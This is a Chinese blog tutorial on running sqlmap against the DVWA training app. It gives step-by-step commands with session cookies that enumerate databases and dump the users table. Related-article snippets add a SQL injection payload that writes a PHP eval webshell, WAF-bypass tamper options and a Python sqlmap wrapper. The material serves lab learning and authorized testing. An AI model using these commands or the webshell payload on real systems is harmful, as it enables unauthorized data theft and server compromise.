sqlmap-----DVWA测试

最新推荐文章于 2025-07-11 18:58:51 发布
最新推荐文章于 2025-07-11 18:58:51 发布
阅读量222 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/lyxin/p/9192665.html
本文通过DVWA平台演示了从简单试探到获取敏感数据的全过程,包括如何利用SQLMap进行SQL注入攻击,从加入Cookie信息解决重定向问题,到遍历数据库、获取表名、列名直至最终获取数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以dvwa为例,难度简单,使用get方法请求
 
  1.简单试探
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
  返回sqlmap got a 302 redirect to xxx ,是一个重定向,考虑是否需要加入cookie信息。


 
  2.加入cookie
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3"
  返回基本信息

 
  3.遍历数据库
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --dbs


   
   4.指定数据库获取表名
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch -D dvwa --tables
   
   5.获取整个数据表名
    sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --tables

 

   6.获取数据库中的列名

 sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --columns

 

   7.获取数据库内容

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --dump
  

    8.不知道当前数据库是哪一个?

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch --current-db --dump


   -batch 选项选择默认项
  -a  遍历所有数据库
  --current-db  获取当前数据库名(两个“--”)
  --dbs 获取所有数据库(两个“--”)
  --tables  获取所有数据库的表名(两个“--”)
  --columns 获取所有数据库的表的列名(两个“--”)
  -D  指定数据库
  -T  指定表名
  -C  指定列名
  --dump  获取查询结果
  --dump-all  获取整个数据库结果
  --stop=x  x是一个整数,表示筛选结果多少条
  由此可见,条件选项可以叠加。一个“-”表示条件,两个“--”表示获取对象的值

转载于:https://www.cnblogs.com/lyxin/p/9192665.html

【web安全】SQLMap 参数深度解析:--risk 与 --level 详解
KP_0x01的博客
07-08 2015
SQLMap 作为最强大的 SQL 注入自动化工具,其--risk和--level参数是控制测试深度和广度的关键选项。下面我将从原理到实践全面解析这两个参数。作用:控制可能影响数据库稳定性的测试技术取值范围:1-3(默认为1)本质:决定使用哪些可能"危险"的Payload类型作用:控制测试的全面性和Payload数量取值范围:1-5(默认为1)本质:决定测试哪些参数和Payload复杂度。
sqlmap使用教程(6)-注入技术拓展
fanmeng2008的博客
01-25 1579
选项--technique,可以用来指定SQL注入技术,默认为BEUSTQ。其中,B表示基于布尔盲注,E表示基于错误的盲注,U表示基于联合查询注入,S表示堆叠注入,T表示基于时间盲注,Q表示内联查询注入。
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 2394
SQL注入与自动注入
利用DVWA学习sqlmap(1)
csu_vc的博客
07-17 8531
首先我们要在一台机器上配置dvwa环境下载地址 https://github.com/ethicalhack3r/DVWADVWA的源代码下载好之后,我们需要在受害机器上配置web服务,并配置dvwa 这里我使用的是phpstudy,因为它比较方便 把dvwa的源代码解压到phpstudy的www目录下,并到./config目录下修改配置文件把root和passwd修改为当前机器的数据库
sqlmapDVWA 进行自动化 SQL 注入测试
weixin_43435891的博客
07-08 727
SQLMap是一款功能强大的开源SQL注入工具,能够自动检测和利用SQL注入漏洞。它支持多种数据库(MySQL、Oracle等),可自动识别注入点(GET/POST/Cookie等),并能枚举数据库信息、提取数据甚至执行系统命令。常用命令包括基本检测、查看数据库/表/字段、数据导出等,支持代理/WAF绕过。但需注意:未经授权测试违法,可能造成服务崩溃,且遇到强WAF时需配合其他工具。建议仅用于授权测试或靶场练习。
sqlmap dvwa注入测试
weixin_45774059的博客
06-05 371
带上cookie爆出数据库 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit# " --cookie="security=low; PHPSESSID=6tuf1mkr1snkgcgdi0e4gaiam9 " --dbs 列出当前数据库的详细信息 sqlmap -u "https://192.168.43.203/DVWA/vulnerabilities...
【渗透测试】【SqlmapDVWA-SQL Injection(low)
preserphy的博客
07-05 432
①进入sqlmap目录,使用-u命令访问地址:python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"发现跳转到302了,被重定向了,所以这样不行…又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。②使用--cookie命令加...
【渗透测试sqlmap工具注入-基于dvwa的sql injection_dvwa sql注入 sqlmap
2401_84968269的博客
05-13 1278
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
SQLMapSQLMap DVWA实战
Black coder
10-26 737
SQLMap 注入 DVWA实战
渗透工具- SQLMap
LJH1999ZN的博客
02-13 733
一、sqlmap的介绍
注入之SQLMAP,入门手记(DVWA测试环境)
jin9xiao的博客
03-25 459
安装好sqlmap,将路径添加到环境变量 首先找到注入点:http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit 然后进入cmd, 输入: sqlmap.py -u"http://192.168.137.192/DVWA-1.9/vulnerabilities/sqli/?id=2&S...
sqlmap命令学习及测试dvwa_SQL_Injection】
qq_58553228的博客
06-26 725
内容有常见的sqlmap的options,至于script暂未学习到。
sqlmap的常用命令和对dvwa的初,中级sql注入测试
G17653692793的博客
05-03 2341
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]" -D dvwa -Tusers -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users --dump。
【渗透测试】|sqlmap工具注入-基于dvwa的sql injection
yangdan_jiayou的博客
03-27 1426
这个检测结果表明系统对联合查询的处理方式存在漏洞,可以通过联合查询来获取额外的信息或执行其他操作。这个检测结果表明系统对错误消息的处理方式存在漏洞,可以通过错误消息来推断数据库的结构或内容,从而进行注入攻击。这个payload试图通过在查询中嵌入一个时间延迟函数来验证注入点的存在,如果系统在执行这个查询时发生了延迟,那么说明注入点存在,攻击者可以进一步利用这个注入点执行其他操作。这个payload尝试通过在查询中嵌入一个错误,然后通过错误消息中的内容来获取敏感信息或执行其他恶意操作。
sql注入dvwa
weixin_45670595的博客
03-07 7546
SQL injection %28 ( %29 ) %2c , %23 # 写一句话木马 ?id = 1'+union+select+"<?php @eval($_GET['cmd']);?>","webshell" +into+outfile+ 'D:\\phpstudy\\WWW\\dvwa\\cmd.php' --+&Submit=Submit# 关于mysql注释的用法 (dvwa是mysql,post方式) low 1' or '1' ='1
sqlmap自动化漏洞利用(DVWA初、中、高)
热门推荐
qq_42620328的博客
10-14 1万+
sqlmap自动化漏洞利用(DVWA
DVWA-LOW级-SQL手工注入漏洞测试(布尔盲注)+sqlmap自动化注入-小白必看(超详细)
最新发布
kitiu666的博客
07-11 765
上次我们进行了sql注入的靶场练习,通过在输入框输入恶意的sql指令使后台数据库执行,并把结果回显到前端。这次我们继续学习另一种sql的注入方式,布尔盲注,首先我们需要先去了解什么是布尔盲注,又是通过这样的方式得到我们想要得到的信息。其大概意思就是说,假如我们想要得到我们想要获得的信息,只能通过输入指令后观察页面给我们回显的信息或者页面是否有报错等判断我们输入的指令是否正确,可能看到这有人还会一头雾水,觉得很抽象,那么我们直接进行实战解说;
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 2617
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
sqlmap-master使用方法
03-19
### SQLMap Master 的使用方法 SQLMap 是一款强大的自动化 SQL 注入工具,能够帮助安全研究人员发现并利用 SQL 注入漏洞。虽然官方文档中并未特别区分 `sqlmap` 和所谓的 `sqlmap-master`,但从上下文中可以推测,“master”可能是指最新版本或者特定分支下的增强版。 以下是关于 SQLMap 使用的一些核心知识点以及如何高效操作: #### 基础概念 SQLMap 支持多种注入技术,包括布尔盲注、时间盲注、联合查询等,并兼容主流关系型数据库(如 MySQL, PostgreSQL, Oracle 等)。其主要功能可以通过命令行参数实现[^1]。 #### 主要参数说明 以下是一些常用的 SQLMap 参数及其作用: - `-u/--url`: 指定目标 URL。 - `--data`: 提交 POST 数据。 - `--level`: 设置测试级别,默认为 1,最高为 5。 - `--risk`: 风险等级设置,默认为 1,最高为 3。 - `--dbs`: 枚举所有可用的数据库名称。 - `--tables`: 列出指定数据库中的表名。 - `--columns`: 显示选定表中的列名。 - `--dump`: 导出整个数据库的内容。 - `--batch`: 自动运行而不提示用户输入。 - `--random-agent`: 使用随机 User-Agent 进行请求。 - `--tamper`: 调用 tamper 脚本来规避 WAF 或其他防护机制[^2]。 #### 查看当前使用的数据库实例 如果需要确认目标站点正在使用的具体数据库类型,可执行如下命令: ```bash sqlmap -u 'http://example.com/page?id=1' --current-db ``` 上述指令将返回目标服务器上活动的默认数据库名称[^3]。 #### 关于 `search` 和 `dump` 的差异 需要注意的是,`search` 功能主要用于查找符合条件的数据对象(比如某些字段或记录),但如果未提供额外选项(例如 `-D`, `-T`, `-C`),则该功能不会生效;相比之下,`dump` 更倾向于全面提取已知范围内的数据集[^4]。 #### Tamper 脚本的应用场景 Tamper 脚本允许修改原始 payload 形式以便绕过复杂的防御措施。例如,在面对启用了 Magic Quotes GPC 的 PHP 应用程序时,可以选择加载对应的 tamper 文件来调整字符串编码方式: ```bash sqlmap -u "http://vulnerable.site/vuln.php?id=1" --tamper=between.py,timebased_blind.py ``` #### 实际案例分析 假设我们要通过 Sqlmap 获取 DVWA 平台上的敏感信息,则按照以下流程逐步推进即可完成任务: 1. **初步探测**: 执行简单的 GET 请求验证是否存在潜在漏洞; 2. **深入挖掘**: 结合高级配置项进一步探索受影响区域的具体细节; 3. **最终导出**: 将有价值的结果保存至本地文件供后续研究。 --- ### Python 示例代码片段展示调用过程 下面是采用编程接口形式启动 Sqlmap 测试的一个简单例子: ```python import subprocess def run_sqlmap(url): command = [ "sqlmap", "-u", url, "--batch", "--threads=10" ] result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(result.stdout.decode()) if __name__ == "__main__": target_url = "http://testphp.vulnweb.com/artists.php?artist=1" run_sqlmap(target_url) ``` 此脚本定义了一个函数用来封装基本交互逻辑,便于集成到更大规模的安全评估框架之中。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值